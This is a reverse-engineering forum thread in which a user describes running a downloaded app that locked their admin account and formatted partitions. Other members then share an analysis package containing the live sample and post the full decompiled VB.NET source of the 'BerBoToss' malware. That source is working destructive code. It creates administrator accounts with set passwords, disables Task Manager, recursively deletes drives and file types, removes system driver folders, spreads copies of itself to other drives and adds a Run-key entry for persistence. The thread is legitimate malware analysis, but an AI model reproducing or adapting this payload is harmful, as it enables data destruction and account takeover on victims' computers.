take a look

[blackpirate]

hey, i just found a link to an aapp, lets say very handy to have!

i thought that its too nice to be real so i scanned the file first on virustotal , and without any positive result!

then the bad things happened:

after running it..the app created multile user accounts, loked mine (admin), deleted restore point...

very nasty!

can someone debugg it? to see whats its all about and if i tooked any risk? i had some important things on my pc! (passwords etc)

PLEASE BE CAREFULL! RUN IT ON VIRTUAL MACHINE ONLY!

FILE:http://www.sendspace.com/file/w04db8

thnx in advance!

BP

[Nacho_dj]

Hey blackpirate, your data shouldn't be lost. To get access to your data, use ERD Commander and you should be able to access any folder of your system.

Good luck

Nacho_dj

[blackpirate]

thnx Nacho!

as we speak i try to get them with recover my files pro! since,.. donno , but 3 of my hdd partition were formatted ! and you right , from what i see untill now i can recover entire partition!

but none from C: , cause i reinstalled win 7!

btw: what the f#ck1n' app was that ? glad that didnt create lot of damage!

thnx again!

Regards!

BP

[STRELiTZIA]

Hi,

It is a very basic malware with aggressive behavior, language: MS Visual Basic.NET

I made a short analysis...

Analysis package contains:

1- Analysis paper (PDF)

2- Active malware, archive password : malware

3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32bit)

Regards

BerBoToss analysis.rar

[JMC31337]

Hi,

It is a very basic malware with aggressive behavior, language: MS Visual Basic.NET

I made a short analysis...

Analysis package contains:

1- Analysis paper (PDF)

2- Active malware, archive password : malware

3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32bit)

Regards

STREL steppin up to the plate... Nice way to make an entrance...

Edited June 26, 2010 by JMC31337

[JesusSpork]

May be a bit late in with this post, but the program isn't obfuscated

Courtesy of .Net Reflector:

internal sealed class Module1
{
    // Methods
    public static void DisableTaskMgr(bool Enable)
    {
        switch (Enable)
        {
            case false:
                MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "0", RegistryValueKind.DWord);
                break;            case true:
                MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "1", RegistryValueKind.DWord);
                break;
        }
    }    [STAThread]
    public static void Main()
    {
        MyProject.Computer.FileSystem.WriteAllText(@"C:\wmnpdmod.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
        foreach (Process process in Process.GetProcessesByName("firefox"))
        {
            process.Kill();
        }
        foreach (Process process2 in Process.GetProcessesByName("IEXPLORE"))
        {
            process2.Kill();
        }
        foreach (Process process3 in Process.GetProcessesByName("notepad"))
        {
            process3.Kill();
        }
        Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell(@"cmd /c BerBoToss  >nul >C:\WINDOWS\system32\wmp.dll", AppWinStyle.Hide, true, -1);
        Interaction.Shell("net user Administrateur /add", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell("net user Fes_L39_Berbotoss /add", AppWinStyle.MinimizedFocus, false, -1);
        DisableTaskMgr(true);
        Interaction.Shell("net user 3an9oud-La3jeb /add", AppWinStyle.MinimizedFocus, false, -1);
        MyProject.Computer.FileSystem.WriteAllText(@"C:\msimg32.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
        Interaction.Shell("net user Berbotoss_L39 /add", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell("net user Fes_L39_Berbotoss 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell("net user 3an9oud-La3jeb 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell("net user Administrateur 1marocberbotossfes", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell("label c: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label d: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label e: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label f: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label g: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label h: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("label l: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("net user Berbotoss_L39 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
        Interaction.Shell("cmd /c NET SESSION * /del", AppWinStyle.Hide, false, -1);
        Interaction.Shell("cmd /c NET SESSION \\poste_connect\x00e9 /del", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c rd d:\ /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c rd e:\ /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c rd f:\ /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c rd g:\ /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.mp3 /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.jpg /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.zip /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.rar /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c rd C:\WINDOWS\system32\drivers /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.lnk /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.3gp /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c del C:\*.lrc /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell("cmd /c Time 11:11.00", AppWinStyle.Hide, false, -1);
        Interaction.Shell("cmd /c date 01/1/1987", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c echo BerBoToss v1.0 > nul > C:\WINDOWS\system32\obj\Release\BerBoToss.pdb", AppWinStyle.Hide, false, -1);
        Interaction.Shell("cmd /c rundll32.exe user32.dll,LockWorkStation", AppWinStyle.Hide, true, -1);
        Process.Start("http://fassifasso.tripod.com/45313165.54436536543512155450/BerBoToss/index.html");
        Interaction.Shell(@"cmd /c del C:\*.html /s/q", AppWinStyle.Hide, false, -1);
        Interaction.Shell(@"cmd /c copy BerBoToss.exe E:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell(@"cmd /c copy BerBoToss.exe F:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell(@"cmd /c copy BerBoToss.exe D:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell(@"cmd /c copy BerBoToss.exe g:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        Interaction.Shell(@"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BerBoToss /t REG_SZ /d C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
        MyProject.Computer.Clipboard.SetText("BerBoToss V1.0");
        Interaction.Shell(@"cmd /c BerBoToss  >nul >C:\WINDOWS\system32\xpsp2res.dll", AppWinStyle.Hide, true, -1);
        foreach (Process process4 in Process.GetProcessesByName("msnmsgr"))
        {
            process4.Kill();
        }
        MyProject.Computer.FileSystem.WriteAllText(@"C:\kbdhe340.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
        object obj2 = Interaction.MsgBox("BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum \x00b0+... Daba AdiosS Amigoss", MsgBoxStyle.Information, "Maroc Fes Erreur HTTA 39 - Mardankore.dll  ... & ");
    }
}

Edited August 19, 2010 by JesusSpork